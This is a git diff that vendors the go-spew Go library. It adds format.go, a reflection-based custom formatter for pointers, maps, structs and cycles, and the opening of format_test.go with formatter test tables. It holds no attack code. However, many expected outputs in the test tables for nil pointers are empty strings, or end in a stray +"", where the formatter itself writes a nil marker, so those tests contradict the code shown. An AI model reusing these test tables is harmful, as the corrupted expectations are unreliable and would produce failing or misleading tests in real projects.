+ scs := spew.NewDefaultConfig() + scs2 := spew.NewDefaultConfig() + scs.DisableMethods = true + + // Alternatively + // scs := spew.ConfigState{Indent: " ", DisableMethods: true} + // scs2 := spew.ConfigState{Indent: " "} + + // This is of type Flag which implements a Stringer and has raw value 1. + f := flagTwo + + // Dump using the ConfigState instances. + scs.Printf("f: %v\n", f) + scs2.Printf("f: %v\n", f) + + // Output: + // f: 1 + // f: flagTwo +} diff --git a/vendor/github.com/davecgh/go-spew/spew/format.go b/vendor/github.com/davecgh/go-spew/spew/format.go new file mode 100644 index 0000000000..c49875bacb --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/format.go @@ -0,0 +1,419 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew + +import ( + "bytes" + "fmt" + "reflect" + "strconv" + "strings" +) + +// supportedFlags is a list of all the character flags supported by fmt package. +const supportedFlags = "0-+# " + +// formatState implements the fmt.Formatter interface and contains information +// about the state of a formatting operation. The NewFormatter function can +// be used to get a new Formatter which can be used directly as arguments +// in standard fmt package printing calls. 
+type formatState struct { + value interface{} + fs fmt.State + depth int + pointers map[uintptr]int + ignoreNextType bool + cs *ConfigState +} + +// buildDefaultFormat recreates the original format string without precision +// and width information to pass in to fmt.Sprintf in the case of an +// unrecognized type. Unless new types are added to the language, this +// function won't ever be called. +func (f *formatState) buildDefaultFormat() (format string) { + buf := bytes.NewBuffer(percentBytes) + + for _, flag := range supportedFlags { + if f.fs.Flag(int(flag)) { + buf.WriteRune(flag) + } + } + + buf.WriteRune('v') + + format = buf.String() + return format +} + +// constructOrigFormat recreates the original format string including precision +// and width information to pass along to the standard fmt package. This allows +// automatic deferral of all format strings this package doesn't support. +func (f *formatState) constructOrigFormat(verb rune) (format string) { + buf := bytes.NewBuffer(percentBytes) + + for _, flag := range supportedFlags { + if f.fs.Flag(int(flag)) { + buf.WriteRune(flag) + } + } + + if width, ok := f.fs.Width(); ok { + buf.WriteString(strconv.Itoa(width)) + } + + if precision, ok := f.fs.Precision(); ok { + buf.Write(precisionBytes) + buf.WriteString(strconv.Itoa(precision)) + } + + buf.WriteRune(verb) + + format = buf.String() + return format +} + +// unpackValue returns values inside of non-nil interfaces when possible and +// ensures that types for values which have been unpacked from an interface +// are displayed when the show types flag is also set. +// This is useful for data types like structs, arrays, slices, and maps which +// can contain varying types packed inside an interface. 
+func (f *formatState) unpackValue(v reflect.Value) reflect.Value { + if v.Kind() == reflect.Interface { + f.ignoreNextType = false + if !v.IsNil() { + v = v.Elem() + } + } + return v +} + +// formatPtr handles formatting of pointers by indirecting them as necessary. +func (f *formatState) formatPtr(v reflect.Value) { + // Display nil if top level pointer is nil. + showTypes := f.fs.Flag('#') + if v.IsNil() && (!showTypes || f.ignoreNextType) { + f.fs.Write(nilAngleBytes) + return + } + + // Remove pointers at or below the current depth from map used to detect + // circular refs. + for k, depth := range f.pointers { + if depth >= f.depth { + delete(f.pointers, k) + } + } + + // Keep list of all dereferenced pointers to possibly show later. + pointerChain := make([]uintptr, 0) + + // Figure out how many levels of indirection there are by derferencing + // pointers and unpacking interfaces down the chain while detecting circular + // references. + nilFound := false + cycleFound := false + indirects := 0 + ve := v + for ve.Kind() == reflect.Ptr { + if ve.IsNil() { + nilFound = true + break + } + indirects++ + addr := ve.Pointer() + pointerChain = append(pointerChain, addr) + if pd, ok := f.pointers[addr]; ok && pd < f.depth { + cycleFound = true + indirects-- + break + } + f.pointers[addr] = f.depth + + ve = ve.Elem() + if ve.Kind() == reflect.Interface { + if ve.IsNil() { + nilFound = true + break + } + ve = ve.Elem() + } + } + + // Display type or indirection level depending on flags. + if showTypes && !f.ignoreNextType { + f.fs.Write(openParenBytes) + f.fs.Write(bytes.Repeat(asteriskBytes, indirects)) + f.fs.Write([]byte(ve.Type().String())) + f.fs.Write(closeParenBytes) + } else { + if nilFound || cycleFound { + indirects += strings.Count(ve.Type().String(), "*") + } + f.fs.Write(openAngleBytes) + f.fs.Write([]byte(strings.Repeat("*", indirects))) + f.fs.Write(closeAngleBytes) + } + + // Display pointer information depending on flags. 
+ if f.fs.Flag('+') && (len(pointerChain) > 0) { + f.fs.Write(openParenBytes) + for i, addr := range pointerChain { + if i > 0 { + f.fs.Write(pointerChainBytes) + } + printHexPtr(f.fs, addr) + } + f.fs.Write(closeParenBytes) + } + + // Display dereferenced value. + switch { + case nilFound == true: + f.fs.Write(nilAngleBytes) + + case cycleFound == true: + f.fs.Write(circularShortBytes) + + default: + f.ignoreNextType = true + f.format(ve) + } +} + +// format is the main workhorse for providing the Formatter interface. It +// uses the passed reflect value to figure out what kind of object we are +// dealing with and formats it appropriately. It is a recursive function, +// however circular data structures are detected and handled properly. +func (f *formatState) format(v reflect.Value) { + // Handle invalid reflect values immediately. + kind := v.Kind() + if kind == reflect.Invalid { + f.fs.Write(invalidAngleBytes) + return + } + + // Handle pointers specially. + if kind == reflect.Ptr { + f.formatPtr(v) + return + } + + // Print type information unless already handled elsewhere. + if !f.ignoreNextType && f.fs.Flag('#') { + f.fs.Write(openParenBytes) + f.fs.Write([]byte(v.Type().String())) + f.fs.Write(closeParenBytes) + } + f.ignoreNextType = false + + // Call Stringer/error interfaces if they exist and the handle methods + // flag is enabled. + if !f.cs.DisableMethods { + if (kind != reflect.Invalid) && (kind != reflect.Interface) { + if handled := handleMethods(f.cs, f.fs, v); handled { + return + } + } + } + + switch kind { + case reflect.Invalid: + // Do nothing. We should never get here since invalid has already + // been handled above. 
+ + case reflect.Bool: + printBool(f.fs, v.Bool()) + + case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int: + printInt(f.fs, v.Int(), 10) + + case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint: + printUint(f.fs, v.Uint(), 10) + + case reflect.Float32: + printFloat(f.fs, v.Float(), 32) + + case reflect.Float64: + printFloat(f.fs, v.Float(), 64) + + case reflect.Complex64: + printComplex(f.fs, v.Complex(), 32) + + case reflect.Complex128: + printComplex(f.fs, v.Complex(), 64) + + case reflect.Slice: + if v.IsNil() { + f.fs.Write(nilAngleBytes) + break + } + fallthrough + + case reflect.Array: + f.fs.Write(openBracketBytes) + f.depth++ + if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) { + f.fs.Write(maxShortBytes) + } else { + numEntries := v.Len() + for i := 0; i < numEntries; i++ { + if i > 0 { + f.fs.Write(spaceBytes) + } + f.ignoreNextType = true + f.format(f.unpackValue(v.Index(i))) + } + } + f.depth-- + f.fs.Write(closeBracketBytes) + + case reflect.String: + f.fs.Write([]byte(v.String())) + + case reflect.Interface: + // The only time we should get here is for nil interfaces due to + // unpackValue calls. + if v.IsNil() { + f.fs.Write(nilAngleBytes) + } + + case reflect.Ptr: + // Do nothing. We should never get here since pointers have already + // been handled above. 
+ + case reflect.Map: + // nil maps should be indicated as different than empty maps + if v.IsNil() { + f.fs.Write(nilAngleBytes) + break + } + + f.fs.Write(openMapBytes) + f.depth++ + if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) { + f.fs.Write(maxShortBytes) + } else { + keys := v.MapKeys() + if f.cs.SortKeys { + sortValues(keys, f.cs) + } + for i, key := range keys { + if i > 0 { + f.fs.Write(spaceBytes) + } + f.ignoreNextType = true + f.format(f.unpackValue(key)) + f.fs.Write(colonBytes) + f.ignoreNextType = true + f.format(f.unpackValue(v.MapIndex(key))) + } + } + f.depth-- + f.fs.Write(closeMapBytes) + + case reflect.Struct: + numFields := v.NumField() + f.fs.Write(openBraceBytes) + f.depth++ + if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) { + f.fs.Write(maxShortBytes) + } else { + vt := v.Type() + for i := 0; i < numFields; i++ { + if i > 0 { + f.fs.Write(spaceBytes) + } + vtf := vt.Field(i) + if f.fs.Flag('+') || f.fs.Flag('#') { + f.fs.Write([]byte(vtf.Name)) + f.fs.Write(colonBytes) + } + f.format(f.unpackValue(v.Field(i))) + } + } + f.depth-- + f.fs.Write(closeBraceBytes) + + case reflect.Uintptr: + printHexPtr(f.fs, uintptr(v.Uint())) + + case reflect.UnsafePointer, reflect.Chan, reflect.Func: + printHexPtr(f.fs, v.Pointer()) + + // There were not any other types at the time this code was written, but + // fall back to letting the default fmt package handle it if any get added. + default: + format := f.buildDefaultFormat() + if v.CanInterface() { + fmt.Fprintf(f.fs, format, v.Interface()) + } else { + fmt.Fprintf(f.fs, format, v.String()) + } + } +} + +// Format satisfies the fmt.Formatter interface. See NewFormatter for usage +// details. +func (f *formatState) Format(fs fmt.State, verb rune) { + f.fs = fs + + // Use standard formatting for verbs that are not v. 
+ if verb != 'v' { + format := f.constructOrigFormat(verb) + fmt.Fprintf(fs, format, f.value) + return + } + + if f.value == nil { + if fs.Flag('#') { + fs.Write(interfaceBytes) + } + fs.Write(nilAngleBytes) + return + } + + f.format(reflect.ValueOf(f.value)) +} + +// newFormatter is a helper function to consolidate the logic from the various +// public methods which take varying config states. +func newFormatter(cs *ConfigState, v interface{}) fmt.Formatter { + fs := &formatState{value: v, cs: cs} + fs.pointers = make(map[uintptr]int) + return fs +} + +/* +NewFormatter returns a custom formatter that satisfies the fmt.Formatter +interface. As a result, it integrates cleanly with standard fmt package +printing functions. The formatter is useful for inline printing of smaller data +types similar to the standard %v format specifier. + +The custom formatter only responds to the %v (most compact), %+v (adds pointer +addresses), %#v (adds types), or %#+v (adds types and pointer addresses) verb +combinations. Any other verbs such as %x and %q will be sent to the the +standard fmt package for formatting. In addition, the custom formatter ignores +the width and precision arguments (however they will still work on the format +specifiers not handled by the custom formatter). + +Typically this function shouldn't be called directly. It is much easier to make +use of the custom formatter by calling one of the convenience functions such as +Printf, Println, or Fprintf. 
+*/ +func NewFormatter(v interface{}) fmt.Formatter { + return newFormatter(&Config, v) +} diff --git a/vendor/github.com/davecgh/go-spew/spew/format_test.go b/vendor/github.com/davecgh/go-spew/spew/format_test.go new file mode 100644 index 0000000000..f9b93abe86 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/format_test.go @@ -0,0 +1,1558 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +/* +Test Summary: +NOTE: For each test, a nil pointer, a single pointer and double pointer to the +base test element are also tested to ensure proper indirection across all types. 
+ +- Max int8, int16, int32, int64, int +- Max uint8, uint16, uint32, uint64, uint +- Boolean true and false +- Standard complex64 and complex128 +- Array containing standard ints +- Array containing type with custom formatter on pointer receiver only +- Array containing interfaces +- Slice containing standard float32 values +- Slice containing type with custom formatter on pointer receiver only +- Slice containing interfaces +- Nil slice +- Standard string +- Nil interface +- Sub-interface +- Map with string keys and int vals +- Map with custom formatter type on pointer receiver only keys and vals +- Map with interface keys and values +- Map with nil interface value +- Struct with primitives +- Struct that contains another struct +- Struct that contains custom type with Stringer pointer interface via both + exported and unexported fields +- Struct that contains embedded struct and field to same struct +- Uintptr to 0 (null pointer) +- Uintptr address of real variable +- Unsafe.Pointer to 0 (null pointer) +- Unsafe.Pointer to address of real variable +- Nil channel +- Standard int channel +- Function with no params and no returns +- Function with param and no returns +- Function with multiple params and multiple returns +- Struct that is circular through self referencing +- Structs that are circular through cross referencing +- Structs that are indirectly circular +- Type that panics in its Stringer interface +- Type that has a custom Error interface +- %x passthrough with uint +- %#x passthrough with uint +- %f passthrough with precision +- %f passthrough with width and precision +- %d passthrough with width +- %q passthrough with string +*/ + +package spew_test + +import ( + "bytes" + "fmt" + "testing" + "unsafe" + + "github.com/davecgh/go-spew/spew" +) + +// formatterTest is used to describe a test to be performed against NewFormatter. 
+type formatterTest struct { + format string + in interface{} + wants []string +} + +// formatterTests houses all of the tests to be performed against NewFormatter. +var formatterTests = make([]formatterTest, 0) + +// addFormatterTest is a helper method to append the passed input and desired +// result to formatterTests. +func addFormatterTest(format string, in interface{}, wants ...string) { + test := formatterTest{format, in, wants} + formatterTests = append(formatterTests, test) +} + +func addIntFormatterTests() { + // Max int8. + v := int8(127) + nv := (*int8)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "int8" + vs := "127" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Max int16. 
+ v2 := int16(32767) + nv2 := (*int16)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "int16" + v2s := "32767" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") + + // Max int32. + v3 := int32(2147483647) + nv3 := (*int32)(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "int32" + v3s := "2147483647" + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3s) + addFormatterTest("%v", &pv3, "<**>"+v3s) + addFormatterTest("%v", nv3, "") + addFormatterTest("%+v", v3, v3s) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%#v", v3, "("+v3t+")"+v3s) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + + // Max int64. 
+ v4 := int64(9223372036854775807) + nv4 := (*int64)(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "int64" + v4s := "9223372036854775807" + addFormatterTest("%v", v4, v4s) + addFormatterTest("%v", pv4, "<*>"+v4s) + addFormatterTest("%v", &pv4, "<**>"+v4s) + addFormatterTest("%v", nv4, "") + addFormatterTest("%+v", v4, v4s) + addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s) + addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%#v", v4, "("+v4t+")"+v4s) + addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s) + addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s) + addFormatterTest("%#v", nv4, "(*"+v4t+")"+"") + addFormatterTest("%#+v", v4, "("+v4t+")"+v4s) + addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s) + addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s) + addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"") + + // Max int. + v5 := int(2147483647) + nv5 := (*int)(nil) + pv5 := &v5 + v5Addr := fmt.Sprintf("%p", pv5) + pv5Addr := fmt.Sprintf("%p", &pv5) + v5t := "int" + v5s := "2147483647" + addFormatterTest("%v", v5, v5s) + addFormatterTest("%v", pv5, "<*>"+v5s) + addFormatterTest("%v", &pv5, "<**>"+v5s) + addFormatterTest("%v", nv5, "") + addFormatterTest("%+v", v5, v5s) + addFormatterTest("%+v", pv5, "<*>("+v5Addr+")"+v5s) + addFormatterTest("%+v", &pv5, "<**>("+pv5Addr+"->"+v5Addr+")"+v5s) + addFormatterTest("%+v", nv5, "") + addFormatterTest("%#v", v5, "("+v5t+")"+v5s) + addFormatterTest("%#v", pv5, "(*"+v5t+")"+v5s) + addFormatterTest("%#v", &pv5, "(**"+v5t+")"+v5s) + addFormatterTest("%#v", nv5, "(*"+v5t+")"+"") + addFormatterTest("%#+v", v5, "("+v5t+")"+v5s) + addFormatterTest("%#+v", pv5, "(*"+v5t+")("+v5Addr+")"+v5s) + addFormatterTest("%#+v", &pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")"+v5s) + addFormatterTest("%#+v", nv5, "(*"+v5t+")"+"") +} + +func addUintFormatterTests() { + // Max uint8. 
+ v := uint8(255) + nv := (*uint8)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "uint8" + vs := "255" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Max uint16. + v2 := uint16(65535) + nv2 := (*uint16)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "uint16" + v2s := "65535" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") + + // Max uint32. 
+ v3 := uint32(4294967295) + nv3 := (*uint32)(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "uint32" + v3s := "4294967295" + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3s) + addFormatterTest("%v", &pv3, "<**>"+v3s) + addFormatterTest("%v", nv3, "") + addFormatterTest("%+v", v3, v3s) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%#v", v3, "("+v3t+")"+v3s) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + + // Max uint64. + v4 := uint64(18446744073709551615) + nv4 := (*uint64)(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "uint64" + v4s := "18446744073709551615" + addFormatterTest("%v", v4, v4s) + addFormatterTest("%v", pv4, "<*>"+v4s) + addFormatterTest("%v", &pv4, "<**>"+v4s) + addFormatterTest("%v", nv4, "") + addFormatterTest("%+v", v4, v4s) + addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s) + addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%#v", v4, "("+v4t+")"+v4s) + addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s) + addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s) + addFormatterTest("%#v", nv4, "(*"+v4t+")"+"") + addFormatterTest("%#+v", v4, "("+v4t+")"+v4s) + addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s) + addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s) + addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"") + + // Max uint. 
+ v5 := uint(4294967295) + nv5 := (*uint)(nil) + pv5 := &v5 + v5Addr := fmt.Sprintf("%p", pv5) + pv5Addr := fmt.Sprintf("%p", &pv5) + v5t := "uint" + v5s := "4294967295" + addFormatterTest("%v", v5, v5s) + addFormatterTest("%v", pv5, "<*>"+v5s) + addFormatterTest("%v", &pv5, "<**>"+v5s) + addFormatterTest("%v", nv5, "") + addFormatterTest("%+v", v5, v5s) + addFormatterTest("%+v", pv5, "<*>("+v5Addr+")"+v5s) + addFormatterTest("%+v", &pv5, "<**>("+pv5Addr+"->"+v5Addr+")"+v5s) + addFormatterTest("%+v", nv5, "") + addFormatterTest("%#v", v5, "("+v5t+")"+v5s) + addFormatterTest("%#v", pv5, "(*"+v5t+")"+v5s) + addFormatterTest("%#v", &pv5, "(**"+v5t+")"+v5s) + addFormatterTest("%#v", nv5, "(*"+v5t+")"+"") + addFormatterTest("%#+v", v5, "("+v5t+")"+v5s) + addFormatterTest("%#+v", pv5, "(*"+v5t+")("+v5Addr+")"+v5s) + addFormatterTest("%#+v", &pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")"+v5s) + addFormatterTest("%#v", nv5, "(*"+v5t+")"+"") +} + +func addBoolFormatterTests() { + // Boolean true. + v := bool(true) + nv := (*bool)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "bool" + vs := "true" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Boolean false. 
+ v2 := bool(false) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "bool" + v2s := "false" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) +} + +func addFloatFormatterTests() { + // Standard float32. + v := float32(3.1415) + nv := (*float32)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "float32" + vs := "3.1415" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Standard float64. 
